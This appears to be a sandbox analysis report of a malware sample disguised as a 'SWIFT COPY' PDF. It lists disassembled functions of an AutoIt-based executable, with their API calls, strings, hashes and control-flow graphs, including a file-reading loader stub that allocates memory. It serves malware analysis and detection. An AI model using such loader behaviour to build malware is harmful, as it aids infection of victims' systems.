                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    • __lseeki64_nolock.LIBCMT ref: 0095620D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00956342
                                                                                    • ___createFile.LIBCMT ref: 00956361
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0095636E
                                                                                    • __dosmaperr.LIBCMT ref: 00956375
                                                                                    • __free_osfhnd.LIBCMT ref: 00956395
                                                                                    • __invoke_watson.LIBCMT ref: 009563C3
                                                                                    • __wsopen_helper.LIBCMT ref: 009563DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                    • String ID: @
                                                                                    • API String ID: 3896587723-2766056989
                                                                                    • Opcode ID: 4849a75ade8f7bbbc823cde8889e10a2091c0bdd1c8c176025bd7664df6acb95
                                                                                    • Instruction ID: 5294c87d2eb56b27b6753a91a46743c95a5f7eedc3e79a4d8df99933945b0058
                                                                                    • Opcode Fuzzy Hash: 4849a75ade8f7bbbc823cde8889e10a2091c0bdd1c8c176025bd7664df6acb95
                                                                                    • Instruction Fuzzy Hash: 0A22557190460A9BEF25DF6ACC95BBD7B35EF40326F254228EC219B2E2C7398D48C751
                                                                                    Function 0096FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _wcscpy.LIBCMT ref: 0096FA96
                                                                                    • _wcschr.LIBCMT ref: 0096FAA4
                                                                                    • _wcscpy.LIBCMT ref: 0096FABB
                                                                                    • _wcscat.LIBCMT ref: 0096FACA
                                                                                    • _wcscat.LIBCMT ref: 0096FAE8
                                                                                    • _wcscpy.LIBCMT ref: 0096FB09
                                                                                    • __wsplitpath.LIBCMT ref: 0096FBE6
                                                                                    • _wcscpy.LIBCMT ref: 0096FC0B
                                                                                    • _wcscpy.LIBCMT ref: 0096FC1D
                                                                                    • _wcscpy.LIBCMT ref: 0096FC32
                                                                                    • _wcscat.LIBCMT ref: 0096FC47
                                                                                    • _wcscat.LIBCMT ref: 0096FC59
                                                                                    • _wcscat.LIBCMT ref: 0096FC6E
                                                                                      • Part of subcall function 0096BFA4: _wcscmp.LIBCMT ref: 0096C03E
                                                                                      • Part of subcall function 0096BFA4: __wsplitpath.LIBCMT ref: 0096C083
                                                                                      • Part of subcall function 0096BFA4: _wcscpy.LIBCMT ref: 0096C096
                                                                                      • Part of subcall function 0096BFA4: _wcscat.LIBCMT ref: 0096C0A9
                                                                                      • Part of subcall function 0096BFA4: __wsplitpath.LIBCMT ref: 0096C0CE
                                                                                      • Part of subcall function 0096BFA4: _wcscat.LIBCMT ref: 0096C0E4
                                                                                      • Part of subcall function 0096BFA4: _wcscat.LIBCMT ref: 0096C0F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                    • API String ID: 2955681530-2806939583
                                                                                    • Opcode ID: c110010cf55dfde2366440e2007b8b735926dd01972b763cc10ee4ed4fd6328b
                                                                                    • Instruction ID: 9fee8feb0ff180566ef44b8e2cf3a02686dfa31d905e061b2ccc763481e53ab8
                                                                                    • Opcode Fuzzy Hash: c110010cf55dfde2366440e2007b8b735926dd01972b763cc10ee4ed4fd6328b
                                                                                    • Instruction Fuzzy Hash: 7F919172504705AFCB20EB54D891F9AB3E8BFD4310F04886DF99997291DB34FA48CB92
                                                                                    Function 0096BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0096BDB4: __time64.LIBCMT ref: 0096BDBE
                                                                                      • Part of subcall function 00924517: _fseek.LIBCMT ref: 0092452F
                                                                                    • __wsplitpath.LIBCMT ref: 0096C083
                                                                                      • Part of subcall function 00941DFC: __wsplitpath_helper.LIBCMT ref: 00941E3C
                                                                                    • _wcscpy.LIBCMT ref: 0096C096
                                                                                    • _wcscat.LIBCMT ref: 0096C0A9
                                                                                    • __wsplitpath.LIBCMT ref: 0096C0CE
                                                                                    • _wcscat.LIBCMT ref: 0096C0E4
                                                                                    • _wcscat.LIBCMT ref: 0096C0F7
                                                                                    • _wcscmp.LIBCMT ref: 0096C03E
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C65D
                                                                                      • Part of subcall function 0096C56D: _wcscmp.LIBCMT ref: 0096C670
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0096C2A1
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0096C338
                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0096C34E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0096C35F
                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0096C371
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                    • String ID: p1#v`K$v
                                                                                    • API String ID: 2378138488-1068180069
                                                                                    • Opcode ID: 740f60e81d444cf693fe9261ffb1afba27a6324f199f1a6b8b7b9ee9be83036a
                                                                                    • Instruction ID: 3ee44e3c2fa05b0f21cd2b95488cb23c9ae6417628ec1bee2b90292edcf141dc
                                                                                    • Opcode Fuzzy Hash: 740f60e81d444cf693fe9261ffb1afba27a6324f199f1a6b8b7b9ee9be83036a
                                                                                    • Instruction Fuzzy Hash: E1C10BB1E00229ABDF11DF95DC81FEEB7BDAF89310F1040A6F649E6151DB709A848F61
                                                                                    Function 00923F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00923F86
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00923FB0
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923FC1
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00923FDE
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00923FEE
                                                                                    • LoadIconW.USER32(000000A9), ref: 00924004
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00924013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: 87531b4e51c06657f6f5d03c625ec7656865929e765d7d392d6098d3d3acab48
                                                                                    • Instruction ID: a31ffba8bf5faf1d582f864b59f90337928a9d885ed50e4aebbdf4e2810bbbbb
                                                                                    • Opcode Fuzzy Hash: 87531b4e51c06657f6f5d03c625ec7656865929e765d7d392d6098d3d3acab48
                                                                                    • Instruction Fuzzy Hash: B621EAB5D25358AFDB00DFA4EC89BCDBBB4FB09700F00411AF611AA2A0D7B44944EF91
                                                                                    Function 00923742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 961 923742-923762 963 9237c2-9237c4 961->963 964 923764-923767 961->964 963->964 965 9237c6 963->965 966 9237c8 964->966 967 923769-923770 964->967 968 9237ab-9237b3 DefWindowProcW 965->968 969 991e00-991e2e call 922ff6 call 93e312 966->969 970 9237ce-9237d1 966->970 971 923776-92377b 967->971 972 92382c-923834 PostQuitMessage 967->972 973 9237b9-9237bf 968->973 1004 991e33-991e3a 969->1004 974 9237d3-9237d4 970->974 975 9237f6-92381d SetTimer RegisterWindowMessageW 970->975 977 991e88-991e9c call 964ddd 971->977 978 923781-923783 971->978 979 9237f2-9237f4 972->979 980 9237da-9237ed KillTimer call 923847 call 92390f 974->980 981 991da3-991da6 974->981 975->979 983 92381f-92382a CreatePopupMenu 975->983 977->979 995 991ea2 977->995 984 923836-923840 call 93eb83 978->984 985 923789-92378e 978->985 979->973 980->979 988 991da8-991daa 981->988 989 991ddc-991dfb MoveWindow 981->989 983->979 996 923845 984->996 992 991e6d-991e74 985->992 993 923794-923799 985->993 997 991dcb-991dd7 SetFocus 988->997 998 991dac-991daf 988->998 989->979 992->968 1000 991e7a-991e83 call 95a5f3 992->1000 1002 991e58-991e68 call 9655bd 993->1002 1003 92379f-9237a5 993->1003 995->968 996->979 997->979 998->1003 1005 991db5-991dc6 call 922ff6 998->1005 1000->968 1002->979 1003->968 1003->1004 1004->968 1009 991e40-991e53 call 923847 call 924ffc 1004->1009 1005->979 1009->968
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 009237B3
                                                                                    • KillTimer.USER32(?,00000001), ref: 009237DD
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00923800
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0092380B
                                                                                    • CreatePopupMenu.USER32 ref: 0092381F
                                                                                    • PostQuitMessage.USER32(00000000), ref: 0092382E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: TaskbarCreated
                                                                                    • API String ID: 129472671-2362178303
                                                                                    • Opcode ID: ec48ccfabd2129c7f2564e02cb90b312edfe13cb84af1340e988c08812a29761
                                                                                    • Instruction ID: 35921547c036f9d1c47f8ba5e13af309b25e60de6a3b6aa1636a223e6afe2215
                                                                                    • Opcode Fuzzy Hash: ec48ccfabd2129c7f2564e02cb90b312edfe13cb84af1340e988c08812a29761
                                                                                    • Instruction Fuzzy Hash: 98417EF12282A6ABDF245F68FC8AF79369DFB40301F008515F502D61E4CB7D9E80A7A1
                                                                                    Function 00923E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00923E79
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00923E88
                                                                                    • LoadIconW.USER32(00000063), ref: 00923E9E
                                                                                    • LoadIconW.USER32(000000A4), ref: 00923EB0
                                                                                    • LoadIconW.USER32(000000A2), ref: 00923EC2
                                                                                      • Part of subcall function 00924024: LoadImageW.USER32(00920000,00000063,00000001,00000010,00000010,00000000), ref: 00924048
                                                                                    • RegisterClassExW.USER32(?), ref: 00923F30
                                                                                      • Part of subcall function 00923F53: GetSysColorBrush.USER32(0000000F), ref: 00923F86
                                                                                      • Part of subcall function 00923F53: RegisterClassExW.USER32(00000030), ref: 00923FB0
                                                                                      • Part of subcall function 00923F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00923FC1
                                                                                      • Part of subcall function 00923F53: InitCommonControlsEx.COMCTL32(?), ref: 00923FDE
                                                                                      • Part of subcall function 00923F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00923FEE
                                                                                      • Part of subcall function 00923F53: LoadIconW.USER32(000000A9), ref: 00924004
                                                                                      • Part of subcall function 00923F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00924013
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: cecb38513daa684925d17b368be1c564370e74d583f51278f7cc4f55f5aeea34
                                                                                    • Instruction ID: d84a0777aac3df3423ddc56022d17e5256355dff6705f0871af966fd8eb723ba
                                                                                    • Opcode Fuzzy Hash: cecb38513daa684925d17b368be1c564370e74d583f51278f7cc4f55f5aeea34
                                                                                    • Instruction Fuzzy Hash: 5F2132B0E18354ABDB14DFA9EC85A9DBFF5FB48310F00411AE215AB2A0D7754A84EF91
                                                                                    Function 010274D8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1025 10274d8-1027586 call 1024ee8 1028 102758d-10275b3 call 10283e8 CreateFileW 1025->1028 1031 10275b5 1028->1031 1032 10275ba-10275ca 1028->1032 1033 1027705-1027709 1031->1033 1037 10275d1-10275eb VirtualAlloc 1032->1037 1038 10275cc 1032->1038 1035 102774b-102774e 1033->1035 1036 102770b-102770f 1033->1036 1039 1027751-1027758 1035->1039 1040 1027711-1027714 1036->1040 1041 102771b-102771f 1036->1041 1044 10275f2-1027609 ReadFile 1037->1044 1045 10275ed 1037->1045 1038->1033 1046 102775a-1027765 1039->1046 1047 10277ad-10277c2 1039->1047 1040->1041 1042 1027721-102772b 1041->1042 1043 102772f-1027733 1041->1043 1042->1043 1050 1027743 1043->1050 1051 1027735-102773f 1043->1051 1052 1027610-1027650 VirtualAlloc 1044->1052 1053 102760b 1044->1053 1045->1033 1054 1027767 1046->1054 1055 1027769-1027775 1046->1055 1048 10277d2-10277da 1047->1048 1049 10277c4-10277cf VirtualFree 1047->1049 1049->1048 1050->1035 1051->1050 1056 1027652 1052->1056 1057 1027657-1027672 call 1028638 1052->1057 1053->1033 1054->1047 1058 1027777-1027787 1055->1058 1059 1027789-1027795 1055->1059 1056->1033 1065 102767d-1027687 1057->1065 1061 10277ab 1058->1061 1062 10277a2-10277a8 1059->1062 1063 1027797-10277a0 1059->1063 1061->1039 1062->1061 1063->1061 1066 10276ba-10276ce call 1028448 1065->1066 1067 1027689-10276b8 call 1028638 1065->1067 1073 10276d2-10276d6 1066->1073 1074 10276d0 1066->1074 1067->1065 1075 10276e2-10276e6 1073->1075 1076 10276d8-10276dc CloseHandle 1073->1076 1074->1033 1077 10276f6-10276ff 1075->1077 1078 10276e8-10276f3 VirtualFree 1075->1078 1076->1075 1077->1028 1077->1033 1078->1077
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010275A9
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010277CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction ID: f529a4247e5893575d5ce8edc83357ca07418b171da9b156e8f0a8b992540e77
                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                    • Instruction Fuzzy Hash: 01A12A74E00219EBEB14CFA8C898BEEBBB5FF58304F208199E555BB280D7759A41CF54
                                                                                    Function 009249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1134 9249fb-924a25 call 92bcce RegOpenKeyExW 1137 9941cc-9941e3 RegQueryValueExW 1134->1137 1138 924a2b-924a2f 1134->1138 1139 9941e5-994222 call 93f4ea call 9247b7 RegQueryValueExW 1137->1139 1140 994246-99424f RegCloseKey 1137->1140 1145 99423d-994245 call 9247e2 1139->1145 1146 994224-99423b call 926a63 1139->1146 1145->1140 1146->1145
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00924A1D
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009941DB
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0099421A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00994249
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$CloseOpen
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                    • API String ID: 1586453840-614718249
                                                                                    • Opcode ID: f3ee0ed0f03a8b80473a41ce339e41e3dbb4c821924066be544ed15a8ab32e3c
                                                                                    • Instruction ID: b3cdb15e53534bf24b62eaa241e5a6a6e39b9623eadf0563a82dbcd96de90e2d
                                                                                    • Opcode Fuzzy Hash: f3ee0ed0f03a8b80473a41ce339e41e3dbb4c821924066be544ed15a8ab32e3c
                                                                                    • Instruction Fuzzy Hash: 00116D75A11118BEEB00EBA8DD86EEF7BACEF55354F000065B512D6191EA709E029B50
                                                                                    Function 009236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1161 9236b8-923728 CreateWindowExW * 2 ShowWindow * 2
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009236E6
                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00923707
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 0092371B
                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,00923AA3,?), ref: 00923724
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShow
                                                                                    • String ID: AutoIt v3$edit
                                                                                    • API String ID: 1584632944-3779509399
                                                                                    • Opcode ID: 17facc2db9125b720cbf552d2c21c6f6c5c5ae851bd6f6d19480638ab66e8131
                                                                                    • Instruction ID: 3c86003c1a8e7795411b3c7566805992769332cbf13db8d30071af2d1730751b
                                                                                    • Opcode Fuzzy Hash: 17facc2db9125b720cbf552d2c21c6f6c5c5ae851bd6f6d19480638ab66e8131
                                                                                    • Instruction Fuzzy Hash: 3EF0DA755692D07AEB319757AC88E673E7DD7C7F21B00001AFA05AA1A0D5710CD5EAB0
                                                                                    Function 01027298 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 150fileCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1266 1027298-10273d8 call 1024ee8 call 1027188 CreateFileW 1273 10273da 1266->1273 1274 10273df-10273ef 1266->1274 1275 102748f-1027494 1273->1275 1277 10273f1 1274->1277 1278 10273f6-1027410 VirtualAlloc 1274->1278 1277->1275 1279 1027412 1278->1279 1280 1027414-102742b ReadFile 1278->1280 1279->1275 1281 102742f-1027469 call 10271c8 call 1026188 1280->1281 1282 102742d 1280->1282 1287 1027485-102748d ExitProcess 1281->1287 1288 102746b-1027480 call 1027218 1281->1288 1282->1275 1287->1275 1288->1287
                                                                                    APIs
                                                                                      • Part of subcall function 01027188: Sleep.KERNELBASE(000001F4), ref: 01027199
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010273CE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFileSleep
                                                                                    • String ID: QH19EQO886G24WOYZOTZ6YLY64D0
                                                                                    • API String ID: 2694422964-1647047224
                                                                                    • Opcode ID: 5b0b2475bcff951e951938b0aec265dbae51eee0ddc3e74e237ed2729759e2a9
                                                                                    • Instruction ID: a9ff87d8681f2bb39f1b2b10d92ccfa6aaf1f1f69d2586a345ed23eb2e924ccb
                                                                                    • Opcode Fuzzy Hash: 5b0b2475bcff951e951938b0aec265dbae51eee0ddc3e74e237ed2729759e2a9
                                                                                    • Instruction Fuzzy Hash: 0A516430D04298EAEF12D7E4C854BEEBFB5AF15304F044199E6487B2C1D7B91B49CB66
                                                                                    Function 009251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1290 9251af-9251c5 1291 9252a2-9252a6 1290->1291 1292 9251cb-9251e0 call 926b0f 1290->1292 1295 9251e6-925206 call 926a63 1292->1295 1296 993ca1-993cb0 LoadStringW 1292->1296 1299 993cbb-993cd3 call 92510d call 924db1 1295->1299 1301 92520c-925210 1295->1301 1296->1299 1308 925220-92529d call 940d50 call 9250e6 call 940d23 Shell_NotifyIconW call 92cb37 1299->1308 1312 993cd9-993cf7 call 92518c call 924db1 call 92518c 1299->1312 1303 925216-92521b call 92510d 1301->1303 1304 9252a7-9252b0 call 926eed 1301->1304 1303->1308 1304->1308 1308->1291 1312->1308
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0092522F
                                                                                    • _wcscpy.LIBCMT ref: 00925283
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00925293
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00993CB0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
